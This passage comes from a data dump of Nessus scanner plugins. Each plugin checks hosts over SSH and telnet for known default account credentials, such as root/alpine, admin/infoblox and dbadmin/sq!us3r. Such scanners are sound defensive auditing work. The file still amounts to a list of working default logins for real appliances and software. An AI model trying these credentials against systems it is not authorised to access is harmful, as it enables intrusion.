script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (nas4free) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'nas4free'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:08:01", "description": "The account 'admin' on the remote host has the default password '7ujMko0admin'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password '7ujMko0admin' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_7UJMKO0ADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/94367", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"7ujMko0admin\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94367);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '7ujMko0admin' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'7ujMko0admin'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:31:53", "description": "The account 'root' on the remote host has the password 'alpine'.\n\nAn attacker may leverage this issue to gain full access to the affected system.\n\nNote that iPhones are known to use these credentials by default and allow access via SSH when jailbroken.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-11-04T00:00:00", "type": "nessus", "title": "Default Password (alpine) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ALPINE.NASL", "href": "https://www.tenable.com/plugins/nessus/42367", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"alpine\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42367);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (alpine) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a weak password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'alpine'.\n\nAn attacker may leverage this issue to gain full access to the\naffected system.\n\nNote that iPhones are known to use these credentials by default and \nallow access via SSH when jailbroken.\");\n # https://arstechnica.com/gadgets/2009/11/dutch-hacker-holds-jailbroken-iphones-hostage-for-5/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a8323342\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:08:01", "description": "The account 'admin' on the remote host has the default password 'admin1234'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'admin1234' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_ADMIN1234.NASL", "href": "https://www.tenable.com/plugins/nessus/94368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"admin1234\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94368);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'admin1234' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'admin1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:06:05", "description": "The account 'root' on the remote host has the default password 'vizxv'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "type": "nessus", "title": "Default Password 'vizxv' for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_VIZXV.NASL", "href": "https://www.tenable.com/plugins/nessus/94399", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"vizxv\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94399);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'vizxv' for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'vizxv'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:28:33", "description": "The account 'admin' on the remote host has the password 'infoblox'. An attacker may leverage this issue to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-10-22T00:00:00", "type": "nessus", "title": "Default Password (infoblox) for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_INFOBLOX.NASL", "href": "https://www.tenable.com/plugins/nessus/42211", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"infoblox\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42211);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (infoblox) for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the password 'infoblox'. \nAn attacker may leverage this issue to gain total control of the\naffected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:13:27", "description": "The account 'root' on the remote host has the default password 'centreon'. An attacker can leverage this issue to gain administrative access to the affected system.\n\nNote that Centreon Enterprise Server is known to use these credentials to provide complete, administrative access to the virtual appliance.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-12-23T00:00:00", "type": "nessus", "title": "Default Password (centreon) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:merethis:centreon_enterprise_server"], "id": "ACCOUNT_ROOT_CENTREON.NASL", "href": "https://www.tenable.com/plugins/nessus/80222", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"centreon\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80222);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (centreon) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'centreon'. An attacker can leverage this issue to gain administrative\naccess to the affected system.\n\nNote that Centreon Enterprise Server is known to use these credentials\nto provide complete, administrative access to the virtual appliance.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:merethis:centreon_enterprise_server\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:28:33", "description": "The account 'dbadmin' on the remote host has the password 'sq!us3r'. \n\nAn attacker may leverage this issue to gain access to the affected system. \n\nNote that RioRey RIOS appliances, used for dynamic denial of service mitigation, are reported to use these credentials to support connections from rVIEW, the vendor's central management and configuration tool, and that an attacker reportedly may be able to escalate privileges through several vulnerabilities to gain full control over the device.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-10-15T00:00:00", "type": "nessus", "title": "Default Password (sq!us3r) for 'dbadmin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2009-3710"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DBADMIN_SQUS3R.NASL", "href": "https://www.tenable.com/plugins/nessus/42147", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"dbadmin\";\npassword = \"sq!us3r\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42147);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2009-3710\");\n script_bugtraq_id(42349);\n script_xref(name:\"SECUNIA\", value:\"36971\");\n\n script_name(english:\"Default Password (sq!us3r) for 'dbadmin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'dbadmin' on the remote host has the password 'sq!us3r'. \n\nAn attacker may leverage this issue to gain access to the affected\nsystem. \n\nNote that RioRey RIOS appliances, used for dynamic denial of service\nmitigation, are reported to use these credentials to support\nconnections from rVIEW, the vendor's central management and\nconfiguration tool, and that an attacker reportedly may be able to\nescalate privileges through several vulnerabilities to gain full\ncontrol over the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packetstormsecurity.com/0910-exploits/riorey-passwd.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If the affected device is a RioRey platform, contact the vendor for a\npatch. \n\nOtherwise, change the password for this account or disable it.\");\n 